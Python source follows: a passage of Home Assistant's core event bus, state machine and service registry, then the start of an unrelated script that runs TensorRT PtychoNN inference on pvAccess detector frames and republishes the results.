            self.loop.call_soon(stop_homeassistant)
            self.loop.run_forever()

    @asyncio.coroutine
    def async_start(self):
        """Finalize startup from inside the event loop.

        This method is a coroutine.
        """
        # pylint: disable=protected-access
        self.loop._thread_ident = threading.get_ident()
        async_create_timer(self)
        async_monitor_worker_pool(self)
        self.bus.async_fire(EVENT_HOMEASSISTANT_START)
        # Wait (off-loop) for all startup jobs in the pool to finish.
        yield from self.loop.run_in_executor(None, self.pool.block_till_done)
        self.state = CoreState.running

    def add_job(self,
                target: Callable[..., None],
                *args: Any,
                priority: JobPriority=JobPriority.EVENT_DEFAULT) -> None:
        """Add job to the worker pool.

        target: target to call.
        args: parameters for method to call.
        priority: queue priority within the worker pool.
        """
        self.pool.add_job(priority, (target,) + args)

    def async_add_job(self, target: Callable[..., None], *args: Any):
        """Add a job from within the eventloop.

        Dispatches by target kind: callback -> call_soon, coroutine
        function -> new task, anything else -> worker pool.

        target: target to call.
        args: parameters for method to call.
        """
        if is_callback(target):
            self.loop.call_soon(target, *args)
        elif asyncio.iscoroutinefunction(target):
            self.loop.create_task(target(*args))
        else:
            self.add_job(target, *args)

    def async_run_job(self, target: Callable[..., None], *args: Any):
        """Run a job from within the event loop.

        Callbacks run immediately; everything else is scheduled.

        target: target to call.
        args: parameters for method to call.
        """
        if is_callback(target):
            target(*args)
        else:
            self.async_add_job(target, *args)

    def _loop_empty(self):
        """Python 3.4.2 empty loop compatibility function."""
        # pylint: disable=protected-access
        if sys.version_info < (3, 4, 3):
            return len(self.loop._scheduled) == 0 and \
                len(self.loop._ready) == 0
        else:
            return self.loop._current_handle is None and \
                len(self.loop._ready) == 0

    def block_till_done(self):
        """Block till all pending work is done."""
        complete = threading.Event()

        @asyncio.coroutine
        def sleep_wait():
            """Sleep in thread pool."""
            yield from self.loop.run_in_executor(None, time.sleep, 0)

        def notify_when_done():
            """Notify event loop when pool done."""
            count = 0
            while True:
                # Wait for the work queue to empty
                self.pool.block_till_done()
                # Verify the loop is empty
                # NOTE(review): count is never reset, so this requires two
                # empty observations in total, not two consecutive ones.
                if self._loop_empty():
                    count += 1
                if count == 2:
                    break
                # sleep in the loop executor, this forces execution back into
                # the event loop to avoid the block thread from starving the
                # async loop
                run_coroutine_threadsafe(
                    sleep_wait(),
                    self.loop
                ).result()
            complete.set()

        threading.Thread(name="BlockThread", target=notify_when_done).start()
        complete.wait()

    def stop(self) -> None:
        """Stop Home Assistant and shuts down all threads.

        Thread-safe entry point; schedules async_stop on the loop.
        """
        run_coroutine_threadsafe(self.async_stop(), self.loop)

    @asyncio.coroutine
    def async_stop(self) -> None:
        """Stop Home Assistant and shuts down all threads.

        This method is a coroutine.
        """
        self.state = CoreState.stopping
        self.bus.async_fire(EVENT_HOMEASSISTANT_STOP)
        # Drain and stop the worker pool off-loop, then shut the executor.
        yield from self.loop.run_in_executor(None, self.pool.block_till_done)
        yield from self.loop.run_in_executor(None, self.pool.stop)
        self.executor.shutdown()
        self.state = CoreState.not_running
        self.loop.stop()
class EventOrigin(enum.Enum):
    """Represent the origin of an event."""

    local = "LOCAL"
    remote = "REMOTE"

    def __str__(self):
        """Return the string value of the origin."""
        return self.value
class Event(object):
    # pylint: disable=too-few-public-methods
    """A single event travelling over the Bus."""

    __slots__ = ['event_type', 'data', 'origin', 'time_fired']

    def __init__(self, event_type, data=None, origin=EventOrigin.local,
                 time_fired=None):
        """Create a new event of *event_type* with optional payload *data*."""
        self.event_type = event_type
        self.data = data or {}
        self.origin = origin
        self.time_fired = time_fired or dt_util.utcnow()

    def as_dict(self):
        """Return a plain-dict representation of this Event."""
        return dict(
            event_type=self.event_type,
            data=dict(self.data),
            origin=str(self.origin),
            time_fired=self.time_fired,
        )

    def __repr__(self):
        """Return the representation."""
        # pylint: disable=maybe-no-member
        origin_tag = str(self.origin)[0]
        if not self.data:
            return "<Event {}[{}]>".format(self.event_type, origin_tag)
        return "<Event {}[{}]: {}>".format(
            self.event_type, origin_tag, util.repr_helper(self.data))

    def __eq__(self, other):
        """Return True when *other* is an identical Event."""
        if self.__class__ != other.__class__:
            return False
        return ((self.event_type, self.data, self.origin, self.time_fired) ==
                (other.event_type, other.data, other.origin, other.time_fired))
class EventBus(object):
    """Allows firing of and listening for events.

    Listener bookkeeping is mutated only inside the event loop; the
    thread-safe wrappers marshal onto the loop first.
    """

    def __init__(self, pool: util.ThreadPool,
                 loop: asyncio.AbstractEventLoop) -> None:
        """Initialize a new event bus."""
        # event_type -> list of listener callables
        self._listeners = {}
        self._pool = pool
        self._loop = loop

    def async_listeners(self):
        """Dict with events and the number of listeners.

        This method must be run in the event loop.
        """
        return {key: len(self._listeners[key])
                for key in self._listeners}

    @property
    def listeners(self):
        """Dict with events and the number of listeners (thread-safe)."""
        return run_callback_threadsafe(
            self._loop, self.async_listeners
        ).result()

    def fire(self, event_type: str, event_data=None, origin=EventOrigin.local):
        """Fire an event (thread-safe)."""
        if not self._pool.running:
            raise HomeAssistantError('Home Assistant has shut down.')
        self._loop.call_soon_threadsafe(self.async_fire, event_type,
                                        event_data, origin)

    def async_fire(self, event_type: str, event_data=None,
                   origin=EventOrigin.local, wait=False):
        """Fire an event.

        This method must be run in the event loop.
        NOTE(review): the 'wait' parameter is accepted but never used here.
        """
        # Copy the list of the current listeners because some listeners
        # remove themselves as a listener while being executed which
        # causes the iterator to be confused.
        get = self._listeners.get
        listeners = get(MATCH_ALL, []) + get(event_type, [])

        event = Event(event_type, event_data, origin)

        # Time-changed events fire every second; don't spam the log.
        if event_type != EVENT_TIME_CHANGED:
            _LOGGER.info("Bus:Handling %s", event)

        if not listeners:
            return

        job_priority = JobPriority.from_event_type(event_type)

        # Coroutines become tasks, callbacks run via call_soon, everything
        # else is batched into the worker pool.
        sync_jobs = []
        for func in listeners:
            if asyncio.iscoroutinefunction(func):
                self._loop.create_task(func(event))
            elif is_callback(func):
                self._loop.call_soon(func, event)
            else:
                sync_jobs.append((job_priority, (func, event)))

        # Send all the sync jobs at once
        if sync_jobs:
            self._pool.add_many_jobs(sync_jobs)

    def listen(self, event_type, listener):
        """Listen for all events or events of a specific type (thread-safe).

        To listen to all events specify the constant ``MATCH_ALL``
        as event_type.
        Returns a function that removes the listener.
        """
        future = run_callback_threadsafe(
            self._loop, self.async_listen, event_type, listener)
        future.result()

        def remove_listener():
            """Remove the listener."""
            self._remove_listener(event_type, listener)

        return remove_listener

    def async_listen(self, event_type, listener):
        """Listen for all events or events of a specific type.

        To listen to all events specify the constant ``MATCH_ALL``
        as event_type.

        This method must be run in the event loop.
        Returns a function that removes the listener.
        """
        if event_type in self._listeners:
            self._listeners[event_type].append(listener)
        else:
            self._listeners[event_type] = [listener]

        def remove_listener():
            """Remove the listener."""
            self.async_remove_listener(event_type, listener)

        return remove_listener

    def listen_once(self, event_type, listener):
        """Listen once for event of a specific type (thread-safe).

        To listen to all events specify the constant ``MATCH_ALL``
        as event_type.

        Returns function to unsubscribe the listener.
        """
        @ft.wraps(listener)
        def onetime_listener(event):
            """Remove listener from eventbus and then fire listener."""
            if hasattr(onetime_listener, 'run'):
                return
            # Set variable so that we will never run twice.
            # Because the event bus might have to wait till a thread comes
            # available to execute this listener it might occur that the
            # listener gets lined up twice to be executed.
            # This will make sure the second time it does nothing.
            setattr(onetime_listener, 'run', True)
            remove_listener()
            listener(event)

        remove_listener = self.listen(event_type, onetime_listener)

        return remove_listener

    def async_listen_once(self, event_type, listener):
        """Listen once for event of a specific type.

        To listen to all events specify the constant ``MATCH_ALL``
        as event_type.

        Returns registered listener that can be used with remove_listener.

        This method must be run in the event loop.
        """
        @ft.wraps(listener)
        @asyncio.coroutine
        def onetime_listener(event):
            """Remove listener from eventbus and then fire listener."""
            if hasattr(onetime_listener, 'run'):
                return
            # Set variable so that we will never run twice.
            # Because the event bus loop might have async_fire queued multiple
            # times, its possible this listener may already be lined up
            # multiple times as well.
            # This will make sure the second time it does nothing.
            setattr(onetime_listener, 'run', True)
            self.async_remove_listener(event_type, onetime_listener)
            if asyncio.iscoroutinefunction(listener):
                yield from listener(event)
            else:
                job_priority = JobPriority.from_event_type(event.event_type)
                self._pool.add_job(job_priority, (listener, event))

        self.async_listen(event_type, onetime_listener)

        return onetime_listener

    def remove_listener(self, event_type, listener):
        """Remove a listener of a specific event_type. (DEPRECATED 0.28)."""
        _LOGGER.warning('bus.remove_listener has been deprecated. Please use '
                        'the function returned from calling listen.')
        self._remove_listener(event_type, listener)

    def _remove_listener(self, event_type, listener):
        """Remove a listener of a specific event_type (thread-safe)."""
        future = run_callback_threadsafe(
            self._loop,
            self.async_remove_listener, event_type, listener
        )
        future.result()

    def async_remove_listener(self, event_type, listener):
        """Remove a listener of a specific event_type.

        This method must be run in the event loop.
        """
        try:
            self._listeners[event_type].remove(listener)
            # delete event_type list if empty
            if not self._listeners[event_type]:
                self._listeners.pop(event_type)
        except (KeyError, ValueError):
            # KeyError is key event_type listener did not exist
            # ValueError if listener did not exist within event_type
            _LOGGER.warning('Unable to remove unknown listener %s',
                            listener)
class State(object):
    """Object to represent a state within the state machine.

    entity_id: the entity that is represented.
    state: the state of the entity
    attributes: extra information on entity and state
    last_changed: last time the state was changed, not the attributes.
    last_updated: last time this object was updated.
    """

    __slots__ = ['entity_id', 'state', 'attributes',
                 'last_changed', 'last_updated']

    # pylint: disable=too-many-arguments
    def __init__(self, entity_id, state, attributes=None, last_changed=None,
                 last_updated=None):
        """Initialize a new state.

        Raises InvalidEntityFormatError if entity_id is not
        '<domain>.<object_id>'.
        """
        if not valid_entity_id(entity_id):
            raise InvalidEntityFormatError((
                "Invalid entity id encountered: {}. "
                "Format should be <domain>.<object_id>").format(entity_id))
        self.entity_id = entity_id.lower()
        self.state = str(state)
        # Read-only view so consumers cannot mutate shared attributes.
        self.attributes = MappingProxyType(attributes or {})
        self.last_updated = last_updated or dt_util.utcnow()
        self.last_changed = last_changed or self.last_updated

    @property
    def domain(self):
        """Domain of this state."""
        return split_entity_id(self.entity_id)[0]

    @property
    def object_id(self):
        """Object id of this state."""
        return split_entity_id(self.entity_id)[1]

    @property
    def name(self):
        """Name of this state (friendly-name attribute or the object id)."""
        return (
            self.attributes.get(ATTR_FRIENDLY_NAME) or
            self.object_id.replace('_', ' '))

    def as_dict(self):
        """Return a dict representation of the State.

        To be used for JSON serialization.
        Ensures: state == State.from_dict(state.as_dict())
        """
        return {'entity_id': self.entity_id,
                'state': self.state,
                'attributes': dict(self.attributes),
                'last_changed': self.last_changed,
                'last_updated': self.last_updated}

    @classmethod
    def from_dict(cls, json_dict):
        """Initialize a state from a dict; returns None on malformed input.

        Ensures: state == State.from_json_dict(state.to_json_dict())
        """
        if not (json_dict and 'entity_id' in json_dict and
                'state' in json_dict):
            return None
        # Timestamps may arrive as ISO strings (from JSON); parse them back.
        last_changed = json_dict.get('last_changed')
        if isinstance(last_changed, str):
            last_changed = dt_util.parse_datetime(last_changed)
        last_updated = json_dict.get('last_updated')
        if isinstance(last_updated, str):
            last_updated = dt_util.parse_datetime(last_updated)
        return cls(json_dict['entity_id'], json_dict['state'],
                   json_dict.get('attributes'), last_changed, last_updated)

    def __eq__(self, other):
        """Return the comparison of the state.

        Timestamps are not part of the comparison.
        """
        return (self.__class__ == other.__class__ and
                self.entity_id == other.entity_id and
                self.state == other.state and
                self.attributes == other.attributes)

    def __repr__(self):
        """Return the representation of the states."""
        attr = "; {}".format(util.repr_helper(self.attributes)) \
            if self.attributes else ""
        return "<state {}={}{} @ {}>".format(
            self.entity_id, self.state, attr,
            dt_util.as_local(self.last_changed).isoformat())
class StateMachine(object):
    """Helper class that tracks the state of different entities.

    The state dict is mutated only inside the event loop; thread-safe
    wrappers marshal onto the loop first.
    """

    def __init__(self, bus, loop):
        """Initialize state machine."""
        # entity_id (lower-case) -> State
        self._states = {}
        self._bus = bus
        self._loop = loop

    def entity_ids(self, domain_filter=None):
        """List of entity ids that are being tracked (thread-safe)."""
        future = run_callback_threadsafe(
            self._loop, self.async_entity_ids, domain_filter
        )
        return future.result()

    def async_entity_ids(self, domain_filter=None):
        """List of entity ids that are being tracked.

        This method must be run in the event loop.
        """
        if domain_filter is None:
            return list(self._states.keys())
        domain_filter = domain_filter.lower()
        return [state.entity_id for state in self._states.values()
                if state.domain == domain_filter]

    def all(self):
        """Create a list of all states (thread-safe)."""
        return run_callback_threadsafe(self._loop, self.async_all).result()

    def async_all(self):
        """Create a list of all states.

        This method must be run in the event loop.
        """
        return list(self._states.values())

    def get(self, entity_id):
        """Retrieve state of entity_id or None if not found.

        Async friendly.
        """
        return self._states.get(entity_id.lower())

    def is_state(self, entity_id, state):
        """Test if entity exists and is specified state.

        Async friendly.
        """
        state_obj = self.get(entity_id)
        return state_obj and state_obj.state == state

    def is_state_attr(self, entity_id, name, value):
        """Test if entity exists and has a state attribute set to value.

        Async friendly.
        """
        state_obj = self.get(entity_id)
        return state_obj and state_obj.attributes.get(name, None) == value

    def remove(self, entity_id):
        """Remove the state of an entity (thread-safe).

        Returns boolean to indicate if an entity was removed.
        """
        return run_callback_threadsafe(
            self._loop, self.async_remove, entity_id).result()

    def async_remove(self, entity_id):
        """Remove the state of an entity.

        Returns boolean to indicate if an entity was removed.

        This method must be run in the event loop.
        """
        entity_id = entity_id.lower()
        old_state = self._states.pop(entity_id, None)
        if old_state is None:
            return False
        # Removal is announced as a state change to new_state=None.
        event_data = {
            'entity_id': entity_id,
            'old_state': old_state,
            'new_state': None,
        }
        self._bus.async_fire(EVENT_STATE_CHANGED, event_data)
        return True

    def set(self, entity_id, new_state, attributes=None, force_update=False):
        """Set the state of an entity, add entity if it does not exist.

        Attributes is an optional dict to specify attributes of this state.

        If you just update the attributes and not the state, last changed will
        not be affected.
        """
        run_callback_threadsafe(
            self._loop,
            self.async_set, entity_id, new_state, attributes, force_update,
        ).result()

    def async_set(self, entity_id, new_state, attributes=None,
                  force_update=False):
        """Set the state of an entity, add entity if it does not exist.

        Attributes is an optional dict to specify attributes of this state.

        If you just update the attributes and not the state, last changed will
        not be affected.

        This method must be run in the event loop.
        """
        entity_id = entity_id.lower()
        new_state = str(new_state)
        attributes = attributes or {}
        old_state = self._states.get(entity_id)
        is_existing = old_state is not None
        same_state = (is_existing and old_state.state == new_state and
                      not force_update)
        same_attr = is_existing and old_state.attributes == attributes
        # Nothing changed: skip the write and the state_changed event.
        if same_state and same_attr:
            return
        # If state did not exist or is different, set it
        last_changed = old_state.last_changed if same_state else None
        state = State(entity_id, new_state, attributes, last_changed)
        self._states[entity_id] = state
        event_data = {
            'entity_id': entity_id,
            'old_state': old_state,
            'new_state': state,
        }
        self._bus.async_fire(EVENT_STATE_CHANGED, event_data)
# pylint: disable=too-few-public-methods
class Service(object):
    """A registered, callable service handler plus its metadata."""

    __slots__ = ['func', 'description', 'fields', 'schema',
                 'is_callback', 'is_coroutinefunction']

    def __init__(self, func, description, fields, schema):
        """Store the handler, its documentation and its call-style flags."""
        self.func = func
        self.schema = schema
        self.description = description or ''
        self.fields = fields or {}
        # Pre-compute how the handler must be invoked later.
        self.is_callback = is_callback(func)
        self.is_coroutinefunction = asyncio.iscoroutinefunction(func)

    def as_dict(self):
        """Return dictionary representation of this service."""
        return dict(description=self.description, fields=self.fields)
# pylint: disable=too-few-public-methods
class ServiceCall(object):
    """A single invocation of a service."""

    __slots__ = ['domain', 'service', 'data', 'call_id']

    def __init__(self, domain, service, data=None, call_id=None):
        """Initialize a new service call; domain/service are lower-cased."""
        self.domain = domain.lower()
        self.service = service.lower()
        # Read-only view so handlers cannot mutate the caller's dict.
        self.data = MappingProxyType(data or {})
        self.call_id = call_id

    def __repr__(self):
        """Return the representation of the service call."""
        if not self.data:
            return "<ServiceCall {}.{}>".format(self.domain, self.service)
        return "<ServiceCall {}.{}: {}>".format(
            self.domain, self.service, util.repr_helper(self.data))
class ServiceRegistry(object):
    """Offers services over the eventbus.

    Service calls are transported as EVENT_CALL_SERVICE events so any
    registry listening on the bus (local or remote) can execute them.
    """

    def __init__(self, bus, add_job, loop):
        """Initialize a service registry."""
        # domain -> {service_name: Service}
        self._services = {}
        self._add_job = add_job
        self._bus = bus
        self._loop = loop
        # Monotonic counter used to build unique service-call ids.
        self._cur_id = 0
        run_callback_threadsafe(
            loop,
            bus.async_listen, EVENT_CALL_SERVICE, self._event_to_service_call,
        )

    @property
    def services(self):
        """Dict with per domain a list of available services (thread-safe)."""
        return run_callback_threadsafe(
            self._loop, self.async_services,
        ).result()

    def async_services(self):
        """Dict with per domain a list of available services."""
        return {domain: {key: value.as_dict() for key, value
                         in self._services[domain].items()}
                for domain in self._services}

    def has_service(self, domain, service):
        """Test if specified service exists."""
        return service.lower() in self._services.get(domain.lower(), [])

    # pylint: disable=too-many-arguments
    def register(self, domain, service, service_func, description=None,
                 schema=None):
        """
        Register a service (thread-safe).

        Description is a dict containing key 'description' to describe
        the service and a key 'fields' to describe the fields.

        Schema is called to coerce and validate the service data.
        """
        run_callback_threadsafe(
            self._loop,
            self.async_register, domain, service, service_func, description,
            schema
        ).result()

    def async_register(self, domain, service, service_func, description=None,
                       schema=None):
        """
        Register a service.

        Description is a dict containing key 'description' to describe
        the service and a key 'fields' to describe the fields.

        Schema is called to coerce and validate the service data.

        This method must be run in the event loop.
        """
        domain = domain.lower()
        service = service.lower()
        description = description or {}
        service_obj = Service(service_func, description.get('description'),
                              description.get('fields', {}), schema)
        if domain in self._services:
            self._services[domain][service] = service_obj
        else:
            self._services[domain] = {service: service_obj}
        self._bus.async_fire(
            EVENT_SERVICE_REGISTERED,
            {ATTR_DOMAIN: domain, ATTR_SERVICE: service}
        )

    def call(self, domain, service, service_data=None, blocking=False):
        """
        Call a service (thread-safe).

        Specify blocking=True to wait till service is executed.
        Waits a maximum of SERVICE_CALL_LIMIT.

        If blocking = True, will return boolean if service executed
        succesfully within SERVICE_CALL_LIMIT.

        This method will fire an event to call the service.
        This event will be picked up by this ServiceRegistry and any
        other ServiceRegistry that is listening on the EventBus.

        Because the service is sent as an event you are not allowed to use
        the keys ATTR_DOMAIN and ATTR_SERVICE in your service_data.
        """
        return run_coroutine_threadsafe(
            self.async_call(domain, service, service_data, blocking),
            self._loop
        ).result()

    # NOTE(review): decorated @callback but contains 'yield from', so this is
    # a generator-based coroutine in practice — confirm intended decorator.
    @callback
    def async_call(self, domain, service, service_data=None, blocking=False):
        """
        Call a service.

        Specify blocking=True to wait till service is executed.
        Waits a maximum of SERVICE_CALL_LIMIT.

        If blocking = True, will return boolean if service executed
        succesfully within SERVICE_CALL_LIMIT.

        This method will fire an event to call the service.
        This event will be picked up by this ServiceRegistry and any
        other ServiceRegistry that is listening on the EventBus.

        Because the service is sent as an event you are not allowed to use
        the keys ATTR_DOMAIN and ATTR_SERVICE in your service_data.

        This method is a coroutine.
        """
        call_id = self._generate_unique_id()
        event_data = {
            ATTR_DOMAIN: domain.lower(),
            ATTR_SERVICE: service.lower(),
            ATTR_SERVICE_DATA: service_data,
            ATTR_SERVICE_CALL_ID: call_id,
        }

        if blocking:
            # Future resolves when a matching SERVICE_EXECUTED event arrives.
            fut = asyncio.Future(loop=self._loop)

            @callback
            def service_executed(event):
                """Callback method that is called when service is executed."""
                if event.data[ATTR_SERVICE_CALL_ID] == call_id:
                    fut.set_result(True)

            unsub = self._bus.async_listen(EVENT_SERVICE_EXECUTED,
                                           service_executed)

        self._bus.async_fire(EVENT_CALL_SERVICE, event_data)

        if blocking:
            done, _ = yield from asyncio.wait([fut], loop=self._loop,
                                              timeout=SERVICE_CALL_LIMIT)
            success = bool(done)
            unsub()
            return success

    @asyncio.coroutine
    def _event_to_service_call(self, event):
        """Callback for SERVICE_CALLED events from the event bus."""
        service_data = event.data.get(ATTR_SERVICE_DATA) or {}
        domain = event.data.get(ATTR_DOMAIN).lower()
        service = event.data.get(ATTR_SERVICE).lower()
        call_id = event.data.get(ATTR_SERVICE_CALL_ID)

        if not self.has_service(domain, service):
            # Only warn locally; a remote registry may own this service.
            if event.origin == EventOrigin.local:
                _LOGGER.warning('Unable to find service %s/%s',
                                domain, service)
            return

        service_handler = self._services[domain][service]

        def fire_service_executed():
            """Fire service executed event."""
            if not call_id:
                return
            data = {ATTR_SERVICE_CALL_ID: call_id}
            # Coroutine/callback handlers run on the loop, so fire directly;
            # sync handlers run in the pool and must go through the bus.
            if (service_handler.is_coroutinefunction or
                    service_handler.is_callback):
                self._bus.async_fire(EVENT_SERVICE_EXECUTED, data)
            else:
                self._bus.fire(EVENT_SERVICE_EXECUTED, data)

        try:
            if service_handler.schema:
                service_data = service_handler.schema(service_data)
        except vol.Invalid as ex:
            _LOGGER.error('Invalid service data for %s.%s: %s',
                          domain, service, humanize_error(service_data, ex))
            # Still signal completion so blocking callers don't time out.
            fire_service_executed()
            return

        service_call = ServiceCall(domain, service, service_data, call_id)

        if service_handler.is_callback:
            service_handler.func(service_call)
            fire_service_executed()
        elif service_handler.is_coroutinefunction:
            yield from service_handler.func(service_call)
            fire_service_executed()
        else:
            def execute_service():
                """Execute a service and fires a SERVICE_EXECUTED event."""
                service_handler.func(service_call)
                fire_service_executed()

            self._add_job(execute_service, priority=JobPriority.EVENT_SERVICE)

    def _generate_unique_id(self):
        """Generate a unique service call id."""
        self._cur_id += 1
        return "{}-{}".format(id(self), self._cur_id)
class Config(object):
    """Configuration settings for Home Assistant."""

    # pylint: disable=too-many-instance-attributes
    def __init__(self):
        """Initialize a new config object with empty/default settings."""
        self.latitude = None  # type: Optional[float]
        self.longitude = None  # type: Optional[float]
        self.elevation = None  # type: Optional[int]
        self.location_name = None  # type: Optional[str]
        self.time_zone = None  # type: Optional[str]
        self.units = METRIC_SYSTEM  # type: UnitSystem

        # If True, pip install is skipped for requirements on startup
        self.skip_pip = False  # type: bool

        # List of loaded components
        self.components = []

        # Remote.API object pointing at local API
        self.api = None

        # Directory that holds the configuration
        self.config_dir = None

    def distance(self, lat: float, lon: float) -> float:
        """Calculate distance from Home Assistant.

        Distance is computed in meters and converted to the configured
        unit system.
        """
        return self.units.length(
            location.distance(self.latitude, self.longitude, lat, lon), 'm')

    def path(self, *path):
        """Generate path to the file within the config dir.

        Raises HomeAssistantError if config_dir has not been set.
        """
        if self.config_dir is None:
            raise HomeAssistantError("config_dir is not set")
        return os.path.join(self.config_dir, *path)

    def as_dict(self):
        """Create a dict representation of this dict."""
        time_zone = self.time_zone or dt_util.UTC
        # NOTE(review): time_zone.zone assumes a pytz-style tzinfo — confirm.
        return {
            'latitude': self.latitude,
            'longitude': self.longitude,
            'unit_system': self.units.as_dict(),
            'location_name': self.location_name,
            'time_zone': time_zone.zone,
            'components': self.components,
            'config_dir': self.config_dir,
            'version': __version__
        }
def async_create_timer(hass, interval=TIMER_INTERVAL):
    """Create a timer that will start on HOMEASSISTANT_START.

    Once started, fires EVENT_TIME_CHANGED on the bus roughly every
    `interval` seconds until EVENT_HOMEASSISTANT_STOP is seen.
    """
    stop_event = asyncio.Event(loop=hass.loop)

    # Setting the Event inside the loop by marking it as a coroutine
    @callback
    def stop_timer(event):
        """Stop the timer."""
        stop_event.set()

    hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, stop_timer)

    @asyncio.coroutine
    def timer(interval, stop_event):
        """Create an async timer."""
        _LOGGER.info("Timer:starting")
        last_fired_on_second = -1
        calc_now = dt_util.utcnow
        while not stop_event.is_set():
            now = calc_now()
            # First check checks if we are not on a second matching the
            # timer interval. Second check checks if we did not already fire
            # this interval.
            if now.second % interval or \
                    now.second == last_fired_on_second:
                # Sleep till it is the next time that we have to fire an event.
                # Aim for halfway through the second that fits TIMER_INTERVAL.
                # If TIMER_INTERVAL is 10 fire at .5, 10.5, 20.5, etc seconds.
                # This will yield the best results because time.sleep() is not
                # 100% accurate because of non-realtime OS's
                slp_seconds = interval - now.second % interval + \
                    .5 - now.microsecond/1000000.0
                yield from asyncio.sleep(slp_seconds, loop=hass.loop)
                now = calc_now()
            last_fired_on_second = now.second
            # Event might have been set while sleeping
            if not stop_event.is_set():
                try:
                    # Schedule the bus event
                    hass.loop.call_soon(
                        hass.bus.async_fire,
                        EVENT_TIME_CHANGED,
                        {ATTR_NOW: now}
                    )
                except HomeAssistantError:
                    # HA raises error if firing event after it has shut down
                    break

    @asyncio.coroutine
    def start_timer(event):
        """Start our async timer."""
        hass.loop.create_task(timer(interval, stop_event))

    hass.bus.async_listen_once(EVENT_HOMEASSISTANT_START, start_timer)
def create_worker_pool(worker_count=None):
    """Create a worker pool, defaulting to MIN_WORKER_THREAD workers."""
    count = MIN_WORKER_THREAD if worker_count is None else worker_count

    def job_handler(job):
        """Run one queued (func, *args) job without letting it kill the pool."""
        try:
            func, *args = job
            func(*args)
        except Exception:  # pylint: disable=broad-except
            # A failing service/event listener must never crash the ThreadPool.
            _LOGGER.exception("BusHandler:Exception doing job")

    return util.ThreadPool(job_handler, count)
def async_monitor_worker_pool(hass):
    """Create a monitor for the thread pool to check if pool is misbehaving.

    Every MONITOR_POOL_INTERVAL seconds the pending-job count is compared
    against a threshold (3 jobs per worker); when exceeded, all current jobs
    are logged and the threshold doubles to throttle repeated warnings.
    """
    busy_threshold = hass.pool.worker_count * 3
    handle = None  # call_later handle, cancelled on shutdown

    def schedule():
        """Schedule the next threshold check."""
        nonlocal handle
        handle = hass.loop.call_later(MONITOR_POOL_INTERVAL,
                                      check_pool_threshold)

    def check_pool_threshold():
        """Check pool size and warn when too many jobs are pending."""
        nonlocal busy_threshold
        pending_jobs = hass.pool.queue_size
        if pending_jobs < busy_threshold:
            schedule()
            return
        _LOGGER.warning(
            "WorkerPool:All %d threads are busy and %d jobs pending",
            hass.pool.worker_count, pending_jobs)
        for start, job in hass.pool.current_jobs:
            _LOGGER.warning("WorkerPool:Current job started at %s: %s",
                            dt_util.as_local(start).isoformat(), job)
        # Back off: require twice as many pending jobs before warning again.
        busy_threshold *= 2
        schedule()

    schedule()

    @callback
    def stop_monitor(event):
        """Stop the monitor."""
        handle.cancel()

    hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, stop_monitor)
|
main-edge-sm-test.py | import time, queue, threading, sys, os
import torch, argparse, logging
from pvaccess import Channel
from pvaccess import PvObject
import pvaccess as pva
import numpy as np
import tensorrt as trt
sys.path.insert(1, '/home/nvidia-agx/Inference/')
import PtychoNN
from framePreProcess import *
from tensorrtcode_batch import *
class pvaClient:
    """pvAccess client that receives detector frames, preprocesses them,
    runs TensorRT inference and republishes the result as an NtNdArray.

    NOTE(review): depends on project modules (framePreProcess,
    tensorrtcode_batch) and a CUDA/TensorRT runtime; not runnable stand-alone.
    """

    def __init__(self, nth=1):
        """Set up queues, the output PVA server and `nth` worker threads."""
        self.last_uid = None
        self.n_missed = 0
        self.n_received = None
        self.frame_dims = (516, 516)  # raw detector frame size
        self.debug_frame = np.zeros((128,128), dtype=np.int32)
        self.frame_id = None
        self.trt_engine_path = 'auto_PtychoNN_sm.trt'  # serialized TensorRT engine
        self.resolution = (64,64)
        self.server = pva.PvaServer()  # server used to publish inference output
        self.channel_name = 'pvapy:image1'
        #self.channel_name_infer = 'pvapy:image2'
        self.server.addRecord(self.channel_name, pva.NtNdArray())
        self.current_frame_id = 0
        self.frame_map = {}
        self.n_generated_frames = 2
        self.rows = 128   # published image height
        self.cols = 128   # published image width
        self.rows1 = 128
        self.cols1 = 128
        self.trt_outputs = ()
        self.max_batch_size = 1  # frames folded into one inference call
        self.base_seq_id = None  # uid of the first counted frame
        self.frames_processed = 0
        self.trt_inference_wrapper = TRTInference(self.trt_engine_path,
            trt_engine_datatype=trt.DataType.FLOAT,
            batch_size=self.max_batch_size)
        # Unbounded queues: raw frames, preprocessed frames, and their ids.
        self.frame_tq = queue.Queue(maxsize=-1)
        self.processed_tq = queue.Queue(maxsize=-1)
        self.frame_id_tq = queue.Queue(maxsize=-1)
        self.thr_exit = 0  # set non-zero to ask worker threads to exit
        self.recv_frames = None
        self.avg_times = 0
        # Daemon workers: they die with the main thread.
        for _ in range(nth):
            threading.Thread(target=self.frame_process, daemon=True).start()

    def frame_producer(self, frame_id, trt_outputs1, extraFieldsPvObject=None):
        """Wrap one inference result into an NtNdArray ready for publishing."""
        #for frame_id in range(0, self.n_generated_frames):
        if extraFieldsPvObject is None:
            nda = pva.NtNdArray()
        else:
            nda = pva.NtNdArray(extraFieldsPvObject.getStructureDict())
        nda['uniqueId'] = frame_id
        nda['codec'] = pva.PvCodec('pvapyc', pva.PvInt(5))
        dims = [pva.PvDimension(self.rows, 0, self.rows, 1, False), \
                pva.PvDimension(self.cols, 0, self.cols, 1, False)]
        nda['dimension'] = dims
        nda['compressedSize'] = self.rows*self.cols
        nda['uncompressedSize'] = self.rows*self.cols
        ts = self.get_timestamp()
        nda['timeStamp'] = ts
        nda['dataTimeStamp'] = ts
        nda['descriptor'] = 'PvaPy Simulated Image'
        nda['value'] = {'floatValue': trt_outputs1.flatten()}
        attrs = [pva.NtAttribute('ColorMode', pva.PvInt(0))]
        nda['attribute'] = attrs
        if extraFieldsPvObject is not None:
            nda.set(extraFieldsPvObject)
        #self.frame_map[frame_id] = nda
        return nda

    def get_timestamp(self):
        """Current wall-clock time split into (seconds, nanoseconds)."""
        s = time.time()
        ns = int((s-int(s))*1000000000)
        s = int(s)
        return pva.PvTimeStamp(s,ns)

    def frame_process(self, ):
        """Worker loop: pull raw frames, preprocess, batch, infer, publish."""
        while self.thr_exit == 0:
            try:
                # 1 s timeout so thr_exit is re-checked periodically.
                pv = self.frame_tq.get(block=True, timeout=1)
            except queue.Empty:
                continue
                #logging.error("Queue is empty")
            except:
                #logging.error("Something else of the Queue went wrong")
                continue
            frm_id = pv['uniqueId']
            dims = pv['dimension']
            rows = dims[0]['size']
            cols = dims[1]['size']
